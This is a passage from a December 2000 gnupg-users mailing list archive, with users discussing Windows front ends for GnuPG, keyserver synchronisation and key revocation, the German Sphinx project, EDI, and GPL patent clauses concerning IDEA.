hook it into Outlook, IE, Netscape there, TM> what have you. At present, in Windows, GnuPG is totally a command line program. There are two good interfaces for it that act somewhat like PGPtray, and these are WinPT and GnuPGShell. Using either of these, you can use GnuPG with any Windows MUA. My own Windows MUA, Becky!2, has a GnuPG plug-in which will enable you to interface GnuPG directly from within the program. WinPT is available from: http://www.freenet.de/joesixpack/winpt-en.html GnuPGShell is available from: http://www.bigfoot.com/~rsoft Becky!2 is available from: http://www.rimarts.co.jp the Becky!2 plug-in (BkGnuPG) is available from: http://hp.vector.co.jp/authors/VA023900/gpg-pin/ TM> - Problem #2: It's dog slow. I have still less than 300 keys in my TM> keyring (expecting to double that soon), and often find myself TM> interrupting gpg to read the message instead of waiting to verify TM> the signature. Similar things hold for signing or encrypting a TM> message. I haven't found this (just the opposite) but I use my MUA; if you do that, or one of the interfaces, you will find it works at least as fast as PGP. TM> - Problem #3: I have adjusted gpg to fetch keys on demand from a TM> keyserver. My experience is that these key servers apparently TM> don't synchronize their data sets in a reasonable time frame TM> (weeks!), so I end up fetching keys from varying servers. This TM> is __very__ inconvenient, and of course unsuitable to the casual TM> Winblows user. How do I go about this? WinPT has currently limited keyserver support, but this is being increased in the current version which is in development. Otherwise, use a web based server such as the Esnet server at: http://www.es.net/hypertext/pgp/ alternatively, run PGP 6.5.8 merely for keyserver access. It will show an error warning to the effect of bad parameters, but will (eventually) accept GnuPG keys. Currently, GnuPG has no keyserver support (hopefully to be corrected when GnuPA for Windows becomes available). The PGP servers synchronise very quickly, but GnuPG keys don't seem to be on the default keyservers in PGPtray for some time (as you say). TM> - Problem #4: What to do in the face of massive distribution and TM> promotion of Sphinx which is also _not_ interoperable with any TM> kind of PGP? Excuse my ignorance, but what is Sphinx and is it available for Windows? TM> TM> Please Cc me on answers since I'm not on the list. Thank you! TM> TM> TM> Best Regards, TM> --Toni++ Have done! Graham reply to: graham@todd276.worldonline.co.uk Please PGP/GnuPG sign mail for verification and encrypt for internet security Written on 27 December 2000 17:14:32 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4-1 (MingW32) - GnuPGshell v0.96 Comment: Please use my key ID: 0x99DB10BD iD8DBQE6Sig5LuLY+pnbEL0RArcaAJ4vZX/ZyQ+75HgvUzbVh0u6dGqKWgCcCwer oXp5rtwoQb1ni2T7sSWZz6k= =cb6e -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From trappedvector@crosswinds.net Wed Dec 27 20:49:55 2000 From: trappedvector@crosswinds.net (Martin) Date: Wed, 27 Dec 2000 21:49:55 +0100 Subject: Deleting Keys on Keyservers Message-ID: <20001227214955.A641@crosswinds.net> --TB36FDmn/VVEgNH/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Hello everyone, im just curious. Is there a way to delete a key from a keyserver? Are there any ways to edit keys on keyservers at all? B4N mh --=20 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - Pain is a thing of the mind. The mind can be controlled. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -= - - --TB36FDmn/VVEgNH/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) iD8DBQE6SlXzffxhyW5sNDERAjmmAJ4wLJAtEo5JAbXwuEor3hY1J9B+AQCeL/VB ZAZ8Jcwez5s97D7jwv5saVc= =UxIl -----END PGP SIGNATURE----- --TB36FDmn/VVEgNH/-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From minton@csc.smsu.edu Wed Dec 27 23:13:55 2000 From: minton@csc.smsu.edu (Brian Minton) Date: Wed, 27 Dec 2000 17:13:55 -0600 Subject: Deleting Keys on Keyservers In-Reply-To: <20001227214955.A641@crosswinds.net>; from trappedvector@crosswinds.net on Wed, Dec 27, 2000 at 09:49:55PM +0100 References: <20001227214955.A641@crosswinds.net> Message-ID: <20001227171353.A1049@aspirin.smsu.edu> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Wed, Dec 27, 2000 at 09:49:55PM +0100, Martin wrote: > > Hello everyone, > > im just curious. Is there a way to delete a key from a keyserver? > Are there any ways to edit keys on keyservers at all? Generally, no. While some keyservers will allow you to email the administrator and ask for your key to be deleted, the chances are that it will have already propogated to the other servers. If all you want to do is add a userid, that will be easy to do. If you want to delete a key or userid, I suggest instead that you revoke it, if you still have the secret key available. Then upload the revoked key to the keyservers. Note that if you are using gpg, you will make a seperate revokation certificate which must be imported before sending it to the keyservers (in the case of revoking the entire key). - -- Brian Minton minton@csc.smsu.edu Caution: in case of rapture, this computer will be unoccupied! PGP 0xE177AFF0 fingerprint AB94 E395 78CE 0967 2542 A7B3 178C 3E66 E177 AFF0 -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Snesp0PPDCS0QgIRAhxFAKCYLGcUmudlGe6oCwMr3hPEeIL2UACeMVGF aiTFmC68pcNdNRazWOGM6Bc= =VUyL -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From peter@palfrader.org Thu Dec 28 00:45:35 2000 From: peter@palfrader.org (Peter Palfrader) Date: Thu, 28 Dec 2000 01:45:35 +0100 Subject: Deleting Keys on Keyservers In-Reply-To: <20001227214955.A641@crosswinds.net>; from trappedvector@crosswinds.net on Wed, Dec 27, 2000 at 21:49:55 +0100 References: <20001227214955.A641@crosswinds.net> Message-ID: <20001228014535.A9977@marvin.palfrader.org> Hi Martin! On Wed, 27 Dec 2000, Martin wrote: > im just curious. Is there a way to delete a key from a keyserver? no. > Are there any ways to edit keys on keyservers at all? You can update a key by reuploading it to the server. The server will then merge your new upload into its keyring. HTH yours, peter -- PGP signed and encrypted messages preferred. http://www.palfrader.org/ -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From afx@atsec.com Thu Dec 28 09:53:08 2000 From: afx@atsec.com (Andreas Siegert) Date: Thu, 28 Dec 2000 10:53:08 +0100 Subject: Sphinx In-Reply-To: <20001227104940.B591@aspirin.smsu.edu>; from minton@csc.smsu.edu on Wed, Dec 27, 2000 at 10:49:42AM -0600 References: <20001227124923.25799.qmail@oak.oeko.net> <20001227104940.B591@aspirin.smsu.edu> Message-ID: <20001228105308.A1226@cray.muc.atsec.de> Quoting Brian Minton (minton@csc.smsu.edu) on Wed, Dec 27, 2000 at 10:49:42AM -0600: > > - Problem #4: What to do in the face of massive distribution and > > promotion of Sphinx which is also _not_ interoperable with any > > kind of PGP? > > pardon my ignorance, but I've never heard of Sphinx, what is it? Massive distribution of Sphinx.... I doubt it. This is a German government thingy (http://www.bsi.de/aufgaben/projekte/sphinx/index.htm). None of my commercial customers has ever heard of it. The beauty of Sphinx is the storage of keys in smart cards. But there is near zero chance to use this on a worldwide heterogeneous customer base. Way too much German signature law centered. If you your key contacts for e-mail are in the German government, there is probably no way around it, but for the rest, I really don't think this is the solution, it is way too Germany centric. cheers afx -- atsec information security GmbH Phone: +49-89-44249830 Steinstrasse 68 Fax: +49-89-44249831 D-81667 Muenchen, Germany WWW: www.atsec.com May the Source be with you! -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 28 13:19:25 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 28 Dec 2000 14:19:25 +0100 Subject: GPG revocations & PGP In-Reply-To: <87puienkad.fsf@deneb.enyo.de>; from fw@deneb.enyo.de on Wed, Dec 27, 2000 at 01:03:22PM +0100 References: <200012271115590773.00447890@mail.gmx.net> <87puienkad.fsf@deneb.enyo.de> Message-ID: <20001228141925.F24249@gnupg.de> On Wed, 27 Dec 2000, Florian Weimer wrote: > With --gen-revoke, you have created a bare revocation self-signature. > I think PGP requires that the revocation signature is part of an > OpenPGP public key (see section 11.1 in RFC 2440). It is a feature :-) and some keyservers are patsched to accept this bare revocation. The reason why GnuPG creates a bare revocation signature is for your convenience. Paper is more reliable than a floppy or the hard disk - therefore you should either print or write the revocation cert down, so that you can enter it back (using a normal editor) into a computer from the printout. Doing this for several k of key stuff is not a easy task. IMHO it is easier to take the revocation signature and import it using GnuPG and then send the entire key to the keyserver. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 28 13:37:36 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 28 Dec 2000 14:37:36 +0100 Subject: GnuPG, Winblows, Speed, Key Management In-Reply-To: <20001227124923.25799.qmail@oak.oeko.net>; from support@oeko.net on Wed, Dec 27, 2000 at 01:49:23PM +0100 References: <20001227124923.25799.qmail@oak.oeko.net> Message-ID: <20001228143736.G24249@gnupg.de> On Wed, 27 Dec 2000, Toni Mueller wrote: > - Problem #1: There appears to be no good Winblows interface for it, > or at least no good way to hook it into Outlook, IE, Netscape there, > what have you. All I can say is that we are really working on it. > - Problem #2: It's dog slow. I have still less than 300 keys in my > keyring (expecting to double that soon), and often find myself > interrupting gpg to read the message instead of waiting to verify > the signature. Similar things hold for signing or encrypting a > message. The problem with the slowness is not related directly to crypto but due to 2 things: 1) Sequentiell parsing of the keyring, which is a minor issue for a few hundred keys and PGP does the same. 2) The way gpg calculates the trust which sometimes badly interfere with programs calling gpg. It is slow for the first time you use one key but then it should be faster unless you import new keys. This will be addressed in 1.1 > - Problem #3: I have adjusted gpg to fetch keys on demand from a > keyserver. My experience is that these key servers apparently > don't synchronize their data sets in a reasonable time frame > (weeks!), so I end up fetching keys from varying servers. This > is __very__ inconvenient, and of course unsuitable to the casual > Winblows user. How do I go about this? The keyservers do syncronice but the software used by most keyservers has major problems. Although I don't like to say this, the NAI keyserver (keyserver.pgp.com and wwwkeys.nl.pgp.net) work much better and can now cope with all kinds of OpenPGP keys. There is still some garbage on the keyservers which may give problems for some keys. > - Problem #4: What to do in the face of massive distribution and > promotion of Sphinx which is also _not_ interoperable with any > kind of PGP? Come on, Sphinx[1] is just another governmental try to establish a new infrastructure - Does anybody remember OSI? It is the reason that there used to be no real Internet connection in Germany for a long time. The folks at the University of Dortmund initially gave us TCP/IP access using an guerilla approach. Werner [1] German project for secure communication devoleped on behalf of the BSI and IIRC mainly driver by the need to encrypt the communication between Bonn (old capital) and Berlin. There is no source, it uses hardware and it is not easy to get real info about it due to a "need to know" policy. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Thu Dec 28 13:42:12 2000 From: wk@gnupg.org (Werner Koch) Date: Thu, 28 Dec 2000 14:42:12 +0100 Subject: Sphinx In-Reply-To: <20001228105308.A1226@cray.muc.atsec.de>; from afx@atsec.com on Thu, Dec 28, 2000 at 10:53:08AM +0100 References: <20001227124923.25799.qmail@oak.oeko.net> <20001227104940.B591@aspirin.smsu.edu> <20001228105308.A1226@cray.muc.atsec.de> Message-ID: <20001228144212.H24249@gnupg.de> On Thu, 28 Dec 2000, Andreas Siegert wrote: > centered. If you your key contacts for e-mail are in the German government, > there is probably no way around it, but for the rest, I really don't think They will have to use a kind standard too. I doubt than anyone is using EDI which was proposed for document exchange a long time ago. Everbody is exchanging documents by mailing WORD files. Okay, that is far away from being a standard but nevertheless a world wide deployed data format. So there is still hope. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lazarus@overdue.ompages.com Thu Dec 28 15:50:23 2000 From: lazarus@overdue.ompages.com (Lazarus Long) Date: Thu, 28 Dec 2000 15:50:23 +0000 Subject: Deleting Keys on Keyservers In-Reply-To: <20001227214955.A641@crosswinds.net>; from trappedvector@crosswinds.net on Wed, Dec 27, 2000 at 09:49:55PM +0100 References: <20001227214955.A641@crosswinds.net> Message-ID: <20001228155023.A12367@overdue.dhis.net> --BXVAT5kNtrzKuDFl Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Wed, Dec 27, 2000 at 09:49:55PM +0100, Martin wrote: > From: Martin =20 > im just curious. Is there a way to delete a key from a keyserver? Nope. Once your key is there, you are hanging out there in the wind for spambots to come harvest for all eternity. --=20 Please (OpenPGP) encrypt all mail whenever possible. Request the following Public Keys for Lazarus Long Type Bits/KeyID Fingerprint DSA KeyID: vvvv vvvv ElGamal: 2048g/41783186 47A0 0929 CD9F B53E 49C0 F06C 560E F574 ED0D F80C --BXVAT5kNtrzKuDFl Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: Now ready for primetime! http://www.gnupg.org iD8DBQE6S2E/Vg71dO0N+AwRAhi5AJ9z/yNYDrEFYtVqCrKC2BdyXWGn8gCgku8E 77KXYrfppopGVlkV3Z6q8Hk= =VX+g -----END PGP SIGNATURE----- --BXVAT5kNtrzKuDFl-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From coolesau@ghettoblaster.heim8.tu-clausthal.de Thu Dec 28 16:19:42 2000 From: coolesau@ghettoblaster.heim8.tu-clausthal.de (Stephan Stapel) Date: Thu, 28 Dec 2000 17:19:42 +0100 (CET) Subject: GnuPG, Winblows, Speed, Key Management In-Reply-To: <20001228143736.G24249@gnupg.de> Message-ID: > All I can say is that we are really working on it. Can you please tell more about that? Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From timm@as400ftp.com Thu Dec 28 16:57:38 2000 From: timm@as400ftp.com (Tim McCarthy) Date: Thu, 28 Dec 2000 11:57:38 -0500 Subject: Sphinx Message-ID: > They will have to use a kind standard too. I doubt than anyone is > using EDI which was proposed for document exchange a long time ago. > Everbody is exchanging documents by mailing WORD files. [Tim McCarthy] Not true at all. EDI is used by over 95% of large corporations in the US and a significant portion of small to medium size companies (most large European companies have EDI initiatives too). XML is making a little headway but EDI is still by far the most prevalent form of document exchange both in terms of number of transactions exchanged and sheer byte size. > Okay, that > is far away from being a standard but nevertheless a world wide > deployed data format. So there is still hope. > > Werner > > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From timm@as400ftp.com Thu Dec 28 16:58:05 2000 From: timm@as400ftp.com (Tim McCarthy) Date: Thu, 28 Dec 2000 11:58:05 -0500 Subject: Sphinx Message-ID: You'd be too small, but you can bet that nearly everything you buy in a store from a large retailer was ordered, delivered and invoiced via EDI. If the manufacturer wants the sale data from the cash register they can get it - via EDI. The new moves in EDI (certainly in the US) are now toward using the internet as the delivery mechanism for such transactions - previously private networks were used - using S/MIME for the security services. PGP/MIME is permitted by the EDI-INT spec but S/MIME appears to be the preferred option. TrailBlazer Systems, Inc. http://www.as400ftp.com AS/400 Communications & E-Commerce Solutions Chaos, panic and disorder...my work here is done. > -----Original Message----- > From: Werner Koch [SMTP:wk@gnupg.org] > Sent: Thursday, December 28, 2000 11:21 AM > To: Tim McCarthy > Subject: Re: Sphinx > > On Thu, 28 Dec 2000, Tim McCarthy wrote: > > > [Tim McCarthy] Not true at all. EDI is used by over 95% of > > large corporations in the US and a significant portion of small to > > Maybe, but I have never seen this as a customer/client or whatever > of a company. There seems to be only PDF and Word. > > Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From steven_scott@solutionconsultantsinc.com Thu Dec 28 19:15:22 2000 From: steven_scott@solutionconsultantsinc.com (Steven Scott) Date: Thu, 28 Dec 2000 14:15:22 -0500 Subject: GnuPG 1.0.4-1 + IDEA for Windows References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <977602001.3a4505d13e702@nullify.org> <87zohm7bbl.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <977642284.3a45a32c931d3@nullify.org> <87ae9l7i68.fsf@roy.bad-people-of-the-future.san-francisco.ca.us> <20001224171621.C4668@alcove.wittsend.com> <20001225013036.A2009@alcove.wittsend.com> Message-ID: <003a01c07102$86e80600$5000a8c0@anewstore.com> Actually, section 8 applies to the copyright holder (FSF) which allows them to restrict the distribution of the software to the countries that have the patent problem. This does not conflict the patent statements of section 7, but would allow the copyright holder to restrict the distribution of the software containing the patented code, to only those countries that do not have the patent problem. This would allow the FSF to include the IDEA code in a distribution, but add a restriction that in can not be used in the US, or other countries that have Patents on software. Steven Scott Solution Consultants Inc. Email: mailto:steven_scott@solutionconsultantsinc.com ----- Original Message ----- From: "Michael H. Warfield" To: "ESP" ; "Keith Ray" ; Cc: "Michael H. Warfield" Sent: Monday, December 25, 2000 1:30 AM Subject: Re: GnuPG 1.0.4-1 + IDEA for Windows > Followup, after I reread the GPL yet AGAIN... > > On Sun, Dec 24, 2000 at 05:16:21PM -0500, Michael H. Warfield wrote: > > > The patents clause of the GPL is invalid simply because it doesn't > > address the issue of jurisdiction. With that clause in place, we either > > have software which is GPL in some countries and not in either, or we > > say that any patent anywhere applies which places the GPL hostage to > > any past, present or future patent scheme in any country in the world, > > or we say that one countrie's jurisdiction applies to the entire world. > > (The US applying to EC, yeah right... They'll be singing Jingle Bells > > in hades.) > > Ok... I blew it. The GPL has specific provisions for distribution > in the case of patents enforced in certain geographical areas. > > ] 8. If the distribution and/or use of the Program is restricted in > ] certain countries either by patents or by copyrighted interfaces, the > ] original copyright holder who places the Program under this License > ] may add an explicit geographical distribution limitation excluding > ] those countries, so that distribution is permitted only in or among > ] countries not thus excluded. In such case, this License incorporates > ] the limitation as if written in the body of this License. > > Ok... That sounds like a way out of the box, doesn't it. Add > a message stating the geographical distribution. Of course, the section > says "may add". That's interesting in that we now have a dilema. If > the GPL prohibits any and all patented technology, then this passage > is simply gibberish. You could never HAVE any such qualifying software, > if the very thing itself was prohibited. If it is NOT truely prohibited, > as section 8 implies, then the original copyright holder is only obligated > under a "may" and not even a "should" much less a "must". To use IETF > delineations of nominclature, "must" implies something that is required, > while "should" is something recommended and "may" is something permitted. > So section 8 of the GPL as it is included with GnuPG states that if a > program (implied to be under the GPL or why would we be discussing this) > is restricted by patents (implying that GPL software might be restricted > by patents) then the author is permitted (may) to add a restriction on > distribution. > > It would appear that sections 7 and 8 are in direct conflict > with each other. How can you even have section 8 if an allegation > of patent infringement means that you must refrain entirely from > distribution. Looks like we have an RMS paradox here. > > It's pretty clear that if patents were excluded from GPL software, > section 8 would be superfluous. If section 8 is NOT superfluous, then > patents are permitted in GPL software (even patents without universally > free access as described elsewhere) and if the authors of the GPL had > meant to REQUIRE an author to restrict distribution, they would have > used other verbage in section 8. Section 8 exists and is worded "may". > > BTW... We now have a problem. Since it has been insisted that > this can not be distributed because it contains the Idea algorithm and > that algorithm is patented, there is something else in GnuPG which is > patented. Hyperlinks. Yes folks, in case you have been living under > a rock recently, British Telecom not only claims to hold a patent on > Hyperlinking technology in general but they are also suing Prodigy > for infringing on that patent in the US. With any decent luck (and a > clueful judge) this will be thrown out for the rediculous non-sense that > it is. ITMT, however, GnuPG contains hyperlinks in its README files and > in the various html files and even in a few .c sources. Till it is thrown > out in court, we could be held to be infringing. Even the extreme > rediculous examples that people dream up can't hold a candle to reality. :-( > > Under section 7, we now have an allegation of infringement of > the BT Hyperlink patent. Now we have a problem, even if all of us > AGREE that the patent is rediculous, since the GPL says explicitly, "or > allegation of patent infringement." You don't even have to be proven > to be infringing and it says nothing about the legitimacy or sanity > of the patent itself. It just says "or allegation". Under RMS writing, > we are guilty until proven innocent. > > That's exactly what RMS is point out in this section of the GPL: > > ] Finally, any free program is threatened constantly by software > ] patents. We wish to avoid the danger that redistributors of a free > ] program will individually obtain patent licenses, in effect making the > ] program proprietary. To prevent this, we have made it clear that any > ] patent must be licensed for everyone's free use or not licensed at all. > > Well... According to BT, hyperlinking is not free to use without > royalties (and they are hitting up several other ISP's for royalities > as well). They constitute some small subset of "everyone". > > > > you want in it, and distribute it? > > > He has meet the letter of the GPL as applied in the EC. If it > > doesn't apply in the US, fine. Distribute it from one of the .nl crypto > > sites. Replay changed names and is now what, zedz.net? Upload it to > > zedz.net and be done with it! What are you going to do then? It meets > > the full letter of the GPL. Idea is NOT patented in that jurisdiction. > > Declare the distribution per the GPL and distribute it with that > statement. Question becomes, what consitutes an explicit geographical > distribution limitation? Obviously, a list of countries would qualify. > Would a statement that "can be distributed with no limitations in any > country where Idea is not patented" constitute an explicit geographical > limitation? In most cases, it would. It states a testable definitive > condition underwhich an explicit determination can be made. Works for me. > > > > KR> Why can't we provide TWO versions and let the users decide > > > KR> which best meets there needs? > > > > Well, at the very least, you're requiring some expensive lawyer time > > > to get you to do something that you know you're going to have to do > > > eventually. What good does that do? > > Nope... Take the easy way out of the box. State the distribution > and let the users sort it out, just like they did with the original pgp > and the US export restrictions. Free for distribution in Europe and other > countries not encumbered by software patents. Right there in the GPL. > > My 0.02 euro. > > [...] > > Mike > -- > Michael H. Warfield | (770) 985-6132 | mhw@WittsEnd.com > (The Mad Wizard) | (678) 463-0932 | http://www.wittsend.com/mhw/ > NIC whois: MHW9 | An optimist believes we live in the best of all > PGP Key: 0xDF1DD471 | possible worlds. A pessimist is sure of it! > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From steven_scott@solutionconsultantsinc.com Thu Dec 28 19:20:26 2000 From: steven_scott@solutionconsultantsinc.com (Steven Scott) Date: Thu, 28 Dec 2000 14:20:26 -0500 Subject: Sphinx References: <20001227124923.25799.qmail@oak.oeko.net> <20001227104940.B591@aspirin.smsu.edu> <20001228105308.A1226@cray.muc.atsec.de> <20001228144212.H24249@gnupg.de> Message-ID: <005a01c07103$3bdaa7c0$5000a8c0@anewstore.com> EDI is large around North America with most large companies using the format to exchange data. The data exchanged tends to be (in my experience) transaction record based data, such as an items information, with multiple records for multiple items. Where I worked with EDI, we received test results for a piece from an outside lab via EDI. Each transmission would contain hundreds of pieces, with dozens of transaction lines per piece. EDI tended to be sent over costly permanent connections (direct lines, etc) and is currently moving to the internet for a number of companies. I can see XML replacing EDI at some point, but I think EDI will still be around for some time as it is easier (and less costly) to route the current EDI transmissions via the internet, then it is to rebuild everything in XML. Steven Scott Solution Consultants Inc. Email: mailto:steven_scott@solutionconsultantsinc.com ----- Original Message ----- From: "Werner Koch" To: Cc: "Andreas Siegert" Sent: Thursday, December 28, 2000 8:42 AM Subject: Re: Sphinx > On Thu, 28 Dec 2000, Andreas Siegert wrote: > > > centered. If you your key contacts for e-mail are in the German government, > > there is probably no way around it, but for the rest, I really don't think > > They will have to use a kind standard too. I doubt than anyone is > using EDI which was proposed for document exchange a long time ago. > Everbody is exchanging documents by mailing WORD files. Okay, that > is far away from being a standard but nevertheless a world wide > deployed data format. So there is still hope. > > Werner > > > -- > Archive is at http://lists.gnupg.org - Unsubscribe by sending mail > with a subject of "unsubscribe" to gnupg-users-request@gnupg.org > -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From kai.raven@gmx.de Fri Dec 29 10:15:05 2000 From: kai.raven@gmx.de (Kai Raven) Date: Fri, 29 Dec 2000 11:15:05 +0100 Subject: RSA/DEA signatures Message-ID: <200012291115050436.001B039B@mail.gmx.net> Hi, is it possible to fix the problem with RSA/IDEA keys when signing and encrypting to a user in the next GPG release? PGP 6.5.8 interprets these signatures as detached signatures and PGP 2.6.3 gives the message "Bad or missing CTB_CKE byte". I think it's an old problem? Ciao Kai -- PGP/GPG [RSA]: 2048-bit Key-ID: 0x7B251671 Homepage: http://beam.to/raven GPG&GnuPGshellinfos: http://home.nexgo.de/kraven/pgp/pgp02aa.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From kai.raven@gmx.de Fri Dec 29 10:23:09 2000 From: kai.raven@gmx.de (Kai Raven) Date: Fri, 29 Dec 2000 11:23:09 +0100 Subject: GPG revocations & PGP In-Reply-To: <20001228141925.F24249@gnupg.de> References: <200012271115590773.00447890@mail.gmx.net> <87puienkad.fsf@deneb.enyo.de> <20001228141925.F24249@gnupg.de> Message-ID: <200012291123090993.00226868@mail.gmx.net> Hello Werner, On 28.12.2000 [Time:14:19] you wrote: >IMHO it is easier to take the revocation signature and import it >using GnuPG and then send the entire key to the keyserver. Now i see and the revocation was accepted by pgp5.ai.mit.edu. It would be better to add this procedure in the documentation. Ciao & Thanx Kai -- PGP/GPG [RSA]: 2048-bit Key-ID: 0x7B251671 Homepage: http://beam.to/raven GPG&GnuPGshellinfos: http://home.nexgo.de/kraven/pgp/pgp02aa.html -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From fw@deneb.enyo.de Fri Dec 29 15:23:23 2000 From: fw@deneb.enyo.de (Florian Weimer) Date: 29 Dec 2000 16:23:23 +0100 Subject: GPG revocations & PGP In-Reply-To: <200012291123090993.00226868@mail.gmx.net> References: <200012271115590773.00447890@mail.gmx.net> <87puienkad.fsf@deneb.enyo.de> <20001228141925.F24249@gnupg.de> <200012291123090993.00226868@mail.gmx.net> Message-ID: <87u27njlp0.fsf@deneb.enyo.de> "Kai Raven" writes: > >IMHO it is easier to take the revocation signature and import it > >using GnuPG and then send the entire key to the keyserver. > > Now i see and the revocation was accepted by pgp5.ai.mit.edu. > It would be better to add this procedure in the documentation. Are copyright assignments required for documentation snippets? ;-) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From rich@cnylug.org Sun Dec 31 01:16:46 2000 From: rich@cnylug.org (Rich) Date: Sat, 30 Dec 2000 20:16:46 -0500 Subject: Chaos Congress Message-ID: <3A4E88FE244.23E7RICH@mail.lcsweb.net> Werner, When are you going to upload a transcript of your talks from the Chaos Congress? Just curious. :-) Rich... ________________________________________ The Central New York Linux User Group Now with one of them web page thingies! www.cnylug.org <-> rich@XXXcnylug.org -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org